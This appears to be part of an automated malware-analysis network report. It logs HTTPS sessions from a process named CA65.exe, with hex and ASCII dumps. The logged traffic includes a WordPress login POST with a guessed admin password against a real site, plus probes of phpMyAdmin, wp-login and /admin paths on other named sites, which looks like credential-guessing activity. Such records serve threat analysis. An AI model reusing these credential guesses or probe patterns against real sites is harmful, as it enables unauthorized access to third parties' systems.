20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 Data Ascii: justify-content: flex-end; margin-top: 2em; margin-bottom: 1em; } </style> <div id="aviso-cookies"> <div class='aviso-cookie-text' id="aviso-cookies-text"> </div> <div class='aviso-cookie-buttons'> <a href="https://w

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
343	192.168.2.4	58941	185.162.89.66	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:13 UTC	432	OUT	POST /wp-login.php HTTP/1.1 Host: oceanictrailers.com.au Accept: / Accept-Encoding: deflate, gzip Cookie: wordpress_test_cookie=WP%20Cookie%20check User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://oceanictrailers.com.au/wp-login.php?redirect_to=https%3A%2F%2Foceanictrailers.com.au%2Fwp-admin%2F&reauth=1 Content-Length: 134 Content-Type: application/x-www-form-urlencoded
2023-12-22 20:15:13 UTC	134	OUT	Data Raw: 6c 6f 67 3d 61 64 6d 69 6e 26 70 77 64 3d 54 72 61 69 6c 65 72 73 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 4c 6f 67 2b 49 6e 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 6f 63 65 61 6e 69 63 74 72 61 69 6c 65 72 73 2e 63 6f 6d 2e 61 75 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31 Data Ascii: log=admin&pwd=Trailers&rememberme=forever&wp-submit=Log+In&redirect_to=https%3A%2F%2Foceanictrailers.com.au%2Fwp-admin%2F&testcookie=1
2023-12-22 20:15:14 UTC	508	IN	HTTP/1.1 200 OK Connection: close expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 set-cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure x-frame-options: SAMEORIGIN content-length: 6301 date: Fri, 22 Dec 2023 20:15:14 GMT alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2023-12-22 20:15:14 UTC	860	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 4f 63 65 61 6e 69 63 20 54 72 61 69 6c 65 72 73 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 2c 20 6e 6f 69 6e 64 65 78 2c 20 6e 6f 61 72 63 68 69 76 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; Oceanic Trailers — WordPress</title><meta name='robots' content='max-image-preview:large, noindex, noarchiv
2023-12-22 20:15:14 UTC	5441	IN	Data Raw: 2e 61 75 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 6c 6f 67 69 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 32 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 65 66 65 72 72 65 72 27 20 63 6f 6e 74 65 6e 74 3d 27 73 74 72 69 63 74 2d 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 2d 6f 72 69 67 69 6e 27 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6f 63 65 61 6e 69 63 74 72 61 69 6c 65 72 73 2e 63 6f 6d 2e 61 75 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f Data Ascii: .au/wp-admin/css/login.min.css?ver=6.4.2' media='all' /><meta name='referrer' content='strict-origin-when-cross-origin' /><meta name="viewport" content="width=device-width" /><link rel="icon" href="https://oceanictrailers.com.au/wp-content/uploads/

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
344	192.168.2.4	59131	104.17.166.123	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:13 UTC	396	OUT	GET /pma/ HTTP/1.1 Host: www.liberty25.org Accept: / Accept-Encoding: deflate, gzip Cookie: __cfruid=6e89eba53f0987720ee71e1440dfa8c230359fa8-1703276112; __cf_bm=C86YPVSqmjEsq5GjxRPJxJ3CdGzukUUVUs76EBPNfQM-1703276112-1-AeTBduVZOJEygLyLFclJOTU+KiV0a2Fnc22zbh9aNyl/CKPCDSIMi9DoE56K0VNNDMyjoueX/yTmRykzLyXAqzc= User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:15 UTC	736	IN	HTTP/1.1 404 Not Found Date: Fri, 22 Dec 2023 20:15:15 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close CF-Ray: 839b0921aec5dad5-MIA CF-Cache-Status: EXPIRED Cache-Control: public, s-maxage=300, max-age=30, stale-if-error=21600, stale-while-revalidate=15 Strict-Transport-Security: max-age=31536000 Vary: Accept-Encoding Content-Security-Policy: Referrer-Policy: strict-origin-when-cross-origin X-Content-Type-Options: nosniff X-Download-Options: noopen X-Frame-Options: SAMEORIGIN X-Permitted-Cross-Domain-Policies: none X-Request-Id: 75e16e72-1fa8-4cf8-bf00-e639192e4f6a X-Runtime: 0.692388 X-Xss-Protection: 1; mode=block Server: cloudflare alt-svc: h3=":443"; ma=86400
2023-12-22 20:15:15 UTC	633	IN	Data Raw: 37 63 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 38 5d 3e 20 20 20 20 20 20 20 20 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6c 74 2d 69 65 39 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 4c 69 62 65 72 74 79 20 45 6c 65 6d 65 6e 74 61 72 79 20 53 63 68 6f 6f 6c 20 44 69 73 74 72 69 63 74 Data Ascii: 7cd3<!DOCTYPE html>...[if lte IE 8]> <html lang="en-US" class="lt-ie9"> <![endif]-->...[if gt IE 8]>...> <html lang="en-US"> ...<![endif]--><head><meta charset="utf-8"><title>404 - Page Not Found - Liberty Elementary School District
2023-12-22 20:15:15 UTC	1369	IN	Data Raw: 77 69 6e 64 6f 77 2e 67 61 29 20 7b 0a 09 09 09 09 09 09 09 09 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 67 61 54 65 73 74 29 3b 0a 09 09 09 09 09 09 09 09 67 61 28 27 63 72 65 61 74 65 27 2c 20 27 55 41 2d 31 39 39 31 39 33 37 37 31 2d 31 27 29 3b 0a 09 09 09 09 09 09 09 09 67 61 28 27 73 65 6e 64 27 2c 20 27 70 61 67 65 76 69 65 77 27 2c 20 27 2f 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 2f 77 77 77 2e 6c 69 62 65 72 74 79 32 35 2e 6f 72 67 2f 70 6d 61 2f 27 29 3b 0a 09 09 09 09 09 09 09 7d 0a 09 09 09 09 09 09 7d 2c 20 31 30 29 3b 0a 09 09 09 09 09 7d 29 28 29 3b 0a 09 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 09 09 09 3c 73 63 72 69 70 74 3e 0a 09 09 09 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b Data Ascii: window.ga) {clearInterval(gaTest);ga('create', 'UA-199193771-1');ga('send', 'pageview', '/Page Not Found/www.liberty25.org/pma/');}}, 10);})();</script><script>(function(w,d,s,l,i){w[l]=w[l]\|\|[];
2023-12-22 20:15:15 UTC	1369	IN	Data Raw: 6e 6b 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 73 2e 63 66 6d 3f 62 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 09 09 3c 73 74 79 6c 65 20 69 64 3d 22 66 73 48 53 4c 43 6f 6c 6f 72 73 22 3e 0a 09 09 09 3a 72 6f 6f 74 20 7b 0a 09 09 09 7d 0a 09 09 3c 2f 73 74 79 6c 65 3e 0a 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 2f 75 70 6c 6f 61 64 65 64 2f 74 68 65 6d 65 73 2f 70 6f 6d 66 72 65 74 5f 76 35 2f 6d 61 69 6e 2e 63 73 73 3f 31 36 33 38 35 36 33 34 36 35 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 2f 75 70 6c Data Ascii: nk href="/styles.cfm?b" media="screen" rel="stylesheet"><style id="fsHSLColors">:root {}</style><link rel="stylesheet" media="all" href="/uploaded/themes/pomfret_v5/main.css?1638563465" /><link rel="stylesheet" media="all" href="/upl
2023-12-22 20:15:15 UTC	1369	IN	Data Raw: 32 27 0a 09 09 09 7d 3b 0a 09 09 09 63 6f 6e 73 74 20 73 65 74 74 69 6e 67 73 20 3d 20 46 53 2e 67 65 74 4e 53 28 27 73 65 74 74 69 6e 67 73 27 29 3b 0a 09 09 09 73 65 74 74 69 6e 67 73 2e 73 74 79 6c 65 4d 61 6e 61 67 65 72 45 6e 61 62 6c 65 64 20 3d 20 66 61 6c 73 65 3b 0a 09 09 7d 29 28 77 69 6e 64 6f 77 29 3b 0a 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 0a 09 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 64 61 74 61 2d 6c 6f 67 67 65 64 2d 69 6e 3d 22 66 61 6c 73 65 22 20 64 61 74 61 2d 70 61 67 65 69 64 3d 22 35 22 20 64 61 74 61 2d 6c 61 7a 79 2d 6c 6f 61 64 2d 6d 65 64 69 61 3d 22 66 61 6c 73 65 22 20 64 61 74 61 2d 72 65 73 6f 75 72 63 65 2d 6f 70 74 69 6d 69 7a 61 74 69 6f 6e 73 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 66 73 4c 69 76 65 4d 6f Data Ascii: 2'};const settings = FS.getNS('settings');settings.styleManagerEnabled = false;})(window);</script></head><body data-logged-in="false" data-pageid="5" data-lazy-load-media="false" data-resource-optimizations="true" class="fsLiveMo
2023-12-22 20:15:15 UTC	1369	IN	Data Raw: 22 20 64 61 74 61 2d 75 73 65 2d 6e 65 77 3d 22 74 72 75 65 22 20 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 73 45 6c 65 6d 65 6e 74 43 6f 6e 74 65 6e 74 22 20 3e 0a 09 09 20 20 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 73 65 61 72 63 68 2d 74 72 69 67 67 65 72 22 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 68 69 64 65 74 65 78 74 22 3e 53 65 61 72 63 68 20 4f 70 65 6e 3c 2f 73 70 61 6e 3e 0a 3c 2f 62 75 74 74 6f 6e 3e 0a 0a 09 3c 2f 64 69 76 3e 0a 0a 0a 09 3c 2f 64 69 76 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 73 45 6c 65 6d 65 6e 74 20 66 73 53 65 61 72 63 68 45 6c 65 6d 65 6e 74 20 66 73 53 65 61 72 63 68 46 6f 72 6d 20 73 69 74 65 2d 73 65 61 72 63 68 2d 6f 66 66 63 61 6e 76 61 73 22 20 69 64 3d 22 66 73 45 6c Data Ascii: " data-use-new="true" ><div class="fsElementContent" > <button class="search-trigger"> <span class="hidetext">Search Open</span></button></div></div><div class="fsElement fsSearchElement fsSearchForm site-search-offcanvas" id="fsEl
2023-12-22 20:15:15 UTC	1369	IN	Data Raw: 4b 65 79 77 6f 72 64 22 3e 3c 69 6e 70 75 74 20 63 6c 61 73 73 3d 22 66 73 53 74 79 6c 65 53 65 61 72 63 68 46 69 65 6c 64 20 66 73 53 74 79 6c 65 44 65 66 61 75 6c 74 46 69 65 6c 64 22 20 69 64 3d 22 66 73 53 65 61 72 63 68 49 6e 70 75 74 5f 32 33 31 36 22 20 6e 61 6d 65 3d 22 71 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 57 68 61 74 20 61 72 65 20 79 6f 75 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 3f 22 20 74 79 70 65 3d 22 74 65 78 74 22 3e 3c 62 75 74 74 6f 6e 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 43 6c 65 61 72 22 20 63 6c 61 73 73 3d 22 66 73 42 75 74 74 6f 6e 43 6c 65 61 72 20 66 73 53 74 61 74 65 48 69 64 64 65 6e 22 20 74 79 70 65 3d 22 72 65 73 65 74 22 3e 3c 73 70 61 6e 3e 43 6c 65 61 72 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 3c 2f 64 69 Data Ascii: Keyword"><input class="fsStyleSearchField fsStyleDefaultField" id="fsSearchInput_2316" name="q" placeholder="What are you looking for?" type="text"><button aria-label="Clear" class="fsButtonClear fsStateHidden" type="reset"><span>Clear</span></button></di
2023-12-22 20:15:15 UTC	1369	IN	Data Raw: 74 69 76 69 74 69 65 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 66 73 4e 61 76 50 61 72 65 6e 74 50 61 67 65 22 3e 3c 61 20 68 72 65 66 3d 22 2f 61 62 6f 75 74 2d 6c 69 62 65 72 74 79 2f 64 69 73 74 72 69 63 74 2d 73 65 72 76 69 63 65 73 2f 62 75 73 69 6e 65 73 73 2d 73 65 72 76 69 63 65 73 22 3e 42 75 73 69 6e 65 73 73 20 53 65 72 76 69 63 65 73 3c 2f 61 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 73 4e 61 76 50 61 67 65 49 6e 66 6f 22 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 66 73 4e 61 76 4c 65 76 65 6c 34 22 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 61 62 6f 75 74 2d 6c 69 62 65 72 74 79 2f 64 69 73 74 72 69 63 74 2d 73 65 72 76 69 63 65 73 2f 62 75 73 69 6e 65 73 73 2d 73 65 72 76 69 63 65 73 2f 61 72 69 7a 6f 6e 61 2d 74 61 78 2d 63 Data Ascii: tivities</a></li><li class="fsNavParentPage"><a href="/about-liberty/district-services/business-services">Business Services</a><div class="fsNavPageInfo"><ul class="fsNavLevel4"><li><a href="/about-liberty/district-services/business-services/arizona-tax-c
2023-12-22 20:15:15 UTC	1369	IN	Data Raw: 72 65 66 3d 22 2f 61 62 6f 75 74 2d 6c 69 62 65 72 74 79 2f 64 69 73 74 72 69 63 74 2d 73 65 72 76 69 63 65 73 2f 68 65 61 6c 74 68 2d 73 65 72 76 69 63 65 73 2f 69 6c 6c 6e 65 73 73 2d 61 6e 64 2d 61 74 74 65 6e 64 61 6e 63 65 22 3e 49 6c 6c 6e 65 73 73 20 61 6e 64 20 41 74 74 65 6e 64 61 6e 63 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 61 62 6f 75 74 2d 6c 69 62 65 72 74 79 2f 64 69 73 74 72 69 63 74 2d 73 65 72 76 69 63 65 73 2f 68 65 61 6c 74 68 2d 73 65 72 76 69 63 65 73 2f 69 6d 6d 75 6e 69 7a 61 74 69 6f 6e 22 3e 49 6d 6d 75 6e 69 7a 61 74 69 6f 6e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 61 62 6f 75 74 2d 6c 69 62 65 72 74 79 2f 64 69 73 74 72 69 63 74 2d 73 65 72 76 69 63 65 73 2f 68 65 61 Data Ascii: ref="/about-liberty/district-services/health-services/illness-and-attendance">Illness and Attendance</a></li><li><a href="/about-liberty/district-services/health-services/immunization">Immunization</a></li><li><a href="/about-liberty/district-services/hea
2023-12-22 20:15:15 UTC	1369	IN	Data Raw: 65 72 76 69 63 65 73 2f 73 70 65 63 69 61 6c 2d 73 65 72 76 69 63 65 73 2f 73 70 65 63 69 61 6c 2d 65 64 75 63 61 74 69 6f 6e 22 3e 53 70 65 63 69 61 6c 20 45 64 75 63 61 74 69 6f 6e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 2f 64 69 76 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 66 73 4e 61 76 50 61 72 65 6e 74 50 61 67 65 22 3e 3c 61 20 68 72 65 66 3d 22 2f 61 62 6f 75 74 2d 6c 69 62 65 72 74 79 2f 64 69 73 74 72 69 63 74 2d 73 65 72 76 69 63 65 73 2f 74 65 63 68 6e 6f 6c 6f 67 79 22 3e 54 65 63 68 6e 6f 6c 6f 67 79 3c 2f 61 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 73 4e 61 76 50 61 67 65 49 6e 66 6f 22 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 66 73 4e 61 76 4c 65 76 65 6c 34 22 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 61 62 6f 75 74 2d 6c 69 Data Ascii: ervices/special-services/special-education">Special Education</a></li></ul></div></li><li class="fsNavParentPage"><a href="/about-liberty/district-services/technology">Technology</a><div class="fsNavPageInfo"><ul class="fsNavLevel4"><li><a href="/about-li
2023-12-22 20:15:15 UTC	1369	IN	Data Raw: 74 50 61 67 65 22 3e 3c 61 20 68 72 65 66 3d 22 2f 6c 65 61 72 6e 69 6e 67 22 3e 4c 65 61 72 6e 69 6e 67 3c 2f 61 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 73 4e 61 76 50 61 67 65 49 6e 66 6f 22 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 66 73 4e 61 76 4c 65 76 65 6c 32 22 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 66 73 4e 61 76 50 61 72 65 6e 74 50 61 67 65 22 3e 3c 61 20 68 72 65 66 3d 22 2f 6c 65 61 72 6e 69 6e 67 2f 6c 65 61 72 6e 69 6e 67 2d 65 78 70 65 63 74 61 74 69 6f 6e 73 22 3e 4c 65 61 72 6e 69 6e 67 20 45 78 70 65 63 74 61 74 69 6f 6e 73 20 61 6e 64 20 43 75 72 72 69 63 75 6c 75 6d 3c 2f 61 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 73 4e 61 76 50 61 67 65 49 6e 66 6f 22 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 66 73 4e 61 76 4c 65 76 65 6c 33 22 3e 3c 6c 69 3e Data Ascii: tPage"><a href="/learning">Learning</a><div class="fsNavPageInfo"><ul class="fsNavLevel2"><li class="fsNavParentPage"><a href="/learning/learning-expectations">Learning Expectations and Curriculum</a><div class="fsNavPageInfo"><ul class="fsNavLevel3"><li>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
345	192.168.2.4	59135	50.31.65.5	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:14 UTC	178	OUT	GET /wp-login.php HTTP/1.1 Host: saltdelcolom.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:15 UTC	555	IN	HTTP/1.1 200 OK Connection: close x-powered-by: PHP/7.3.33 expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 set-cookie: wordpress_test_cookie=WP+Cookie+check; path=/; secure x-frame-options: SAMEORIGIN transfer-encoding: chunked date: Fri, 22 Dec 2023 20:15:15 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2023-12-22 20:15:15 UTC	813	IN	Data Raw: 32 31 62 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 63 61 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 45 6e 74 72 61 20 26 6c 73 61 71 75 6f 3b 20 53 61 6c 74 20 64 65 6c 20 43 6f 6c 6f 6d 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 2c 20 6e 6f 69 6e 64 65 78 2c 20 6e 6f 61 72 63 68 69 76 Data Ascii: 21b7<!DOCTYPE html><html lang="ca"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Entra &lsaquo; Salt del Colom — WordPress</title><meta name='robots' content='max-image-preview:large, noindex, noarchiv
2023-12-22 20:15:15 UTC	7826	IN	Data Raw: 73 3a 2f 2f 73 61 6c 74 64 65 6c 63 6f 6c 6f 6d 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 6c 6f 67 69 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 32 2e 33 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 65 66 65 72 72 65 72 27 20 63 6f 6e 74 65 6e 74 3d 27 73 74 72 69 63 74 2d 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 2d 6f 72 69 67 69 6e 27 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 61 6c 74 64 65 6c 63 6f 6c 6f 6d 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 Data Ascii: s://saltdelcolom.com/wp-admin/css/login.min.css?ver=6.2.3' media='all' /><meta name='referrer' content='strict-origin-when-cross-origin' /><meta name="viewport" content="width=device-width" /><link rel="icon" href="https://saltdelcolom.com/wp-conte
2023-12-22 20:15:15 UTC	418	IN	Data Raw: 31 39 36 0d 0a 09 09 09 3c 73 63 72 69 70 74 3e 0d 0a 09 09 09 2f 28 74 72 69 64 65 6e 74 7c 6d 73 69 65 29 2f 69 2e 74 65 73 74 28 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 29 26 26 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 26 26 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 68 61 73 68 63 68 61 6e 67 65 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 2c 65 3d 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 2e 73 75 62 73 74 72 69 6e 67 28 31 29 3b 2f 5e 5b 41 2d 7a 30 2d 39 5f 2d 5d 2b 24 2f 2e 74 65 73 74 28 65 29 26 26 28 74 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 29 26 Data Ascii: 196<script>/(trident\|msie)/i.test(navigator.userAgent)&&document.getElementById&&window.addEventListener&&window.addEventListener("hashchange",function(){var t,e=location.hash.substring(1);/^[A-z0-9_-]+$/.test(e)&&(t=document.getElementById(e))&

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
346	192.168.2.4	59144	104.24.82.4	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:14 UTC	173	OUT	GET /admin HTTP/1.1 Host: www.thenile.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:14 UTC	670	IN	HTTP/1.1 404 Not Found Date: Fri, 22 Dec 2023 20:15:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Cache-Control: private, no-store x-request-id: 1749b7da-d2ee-4d3f-b16e-d0be342102b9 via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=j8z5vYYP7AzTeNBPj6%2BWtf%2FgwrUTsABn%2BDGyF7xiKRXQmQfvj4KgQ4SyluLJHnVmwHuW61%2B%2FLHf9zxH1%2FwxktyQyhhmBpVEZsOFSbmjFeSZ1Ic6U%2BbSiUN%2B7Orddhga1fBKBCA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839b0921bc42da8f-MIA
2023-12-22 20:15:14 UTC	1369	IN	Data Raw: 34 64 31 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 77 69 6e 64 6f 77 2e 41 70 70 56 65 72 73 69 6f 6e 20 3d 20 22 63 68 61 6e 67 65 2d 6d 65 72 67 65 64 2d 6d 61 73 74 65 72 2d 31 36 39 38 38 2d 31 2d 39 36 33 22 3b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 41 70 70 55 72 6c 20 3d 20 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 74 68 65 6e 69 6c 65 2e 63 6f 6d 2e 61 75 22 3b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 53 69 74 65 45 6e 76 69 72 6f 6e 6d 65 6e 74 20 3d 20 22 70 72 6f 64 75 63 74 69 6f 6e 22 3b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 53 69 74 65 47 72 6f 75 70 20 3d 20 22 74 68 65 6e 69 6c Data Ascii: 4d1d<!doctype html><html class="no-js" lang="en"><head><script> window.AppVersion = "change-merged-master-16988-1-963"; window.AppUrl = "https:\/\/www.thenile.com.au"; 